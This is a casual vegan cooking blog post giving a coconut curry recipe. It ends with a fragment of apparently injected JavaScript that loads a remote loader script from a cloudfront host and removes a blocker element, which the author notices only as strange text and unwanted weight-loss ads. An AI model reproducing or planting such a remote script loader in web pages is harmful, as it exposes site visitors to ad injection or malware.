cooking, creativity, Food, Musing, veganism, vegetables

Resurrecting the Blog / Vegan Cooking Adventures / Coconut Curry Dish

Morgan, did I read the date on our last post wrong, or have we really not posted in a month?! WELL, seeing as I’m home now and have got relatively little (scratch that, zero) responsibilities, I figure it’s about time l resurrect Le Blog.

I hope finals aren’t stressing you out too much–remember, “there is no problem on earth that can’t be improved upon by a cup of tea.” Also, I left you a very long rambly message which you really don’t have to listen unless you’re bored in which case it may be kind of amusing.

Anyways, with all my free time I’ve been cooking a lot and curiously, mostly vegan dishes. I think, in part, this is because I’m relishing being home and able to control what goes into my food, what I make, etc. I cooked a rad paella last week but I think tonight I made the best thing so far, a coconut curry sauce over rice.

It was easy/quick–about twenty minutes, start to finish. I cut the recipe in half and laid it over a half cup of rice, which proved the perfect portion for one (my family is not so interested in my vegan experiments. That said, no could tell that this dish was ‘vegan,’ by which they meant they thought it was tasty!)

To make the dish you’ll need:

  • Rice (any kind. I use brown Texmati long grain)
  • Half a can of light coconut milk (so, about a cup)
  • 1 1/2 tsp corn starch
  • 1 1/2 tsp curry powder (or more, depending on how you like it)
  • A couple of cloves of minced garlic
  • 1/4 tsp ginger (preferably fresh, but I didn’t have any so I just used powdered)
  • 1 1/2 tsp ketchup
  • 1/2 tsp onion powder
  • 1/2 tsp tumeric
  • 1/4 tsp salt
  • Some black pepper
  • Half a diced onion
  • Cooked/ chopped broccoli, about a cup or more/less depending on preferences

Steps:

(1) Put the rice on the stove. I did 1/2 cup rice with 1 cup water, bit of olive oil, for twenty or so minutes, making sure to add more water as it cooked).

(2) Mix the corn starch and half of the coconut milk in a bowl and set aside (make sure to mix well, whisking out any clumps).

(3) Mix ALL the other ingredients together in a pot on the stove over medium heat, stirring continually until begins bubbling.

(4) Add remaining coconut water mixture and continue stirring until sauce is “hot, bubbly and creamy”

(5) Pour sauce over rice and eat!

And tadaa!, the finished product:

photo curry dish

The recipe I modified can be found here. It used soba noodles instead of rice, and more veggies than I had on hand. It also added tofu, which I imagine would be pretty good in this too.

Happy cooking, Drew

P.S. what is all this weird text at the bottom of the post? Can’t seem to get rid of it…darn my technological inabilities. Also, for some reason a few of the words in this post are highlighted and have weird weight loss adds connected to them?! grossness.

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

Standard

3 thoughts on “Resurrecting the Blog / Vegan Cooking Adventures / Coconut Curry Dish

Leave a Reply

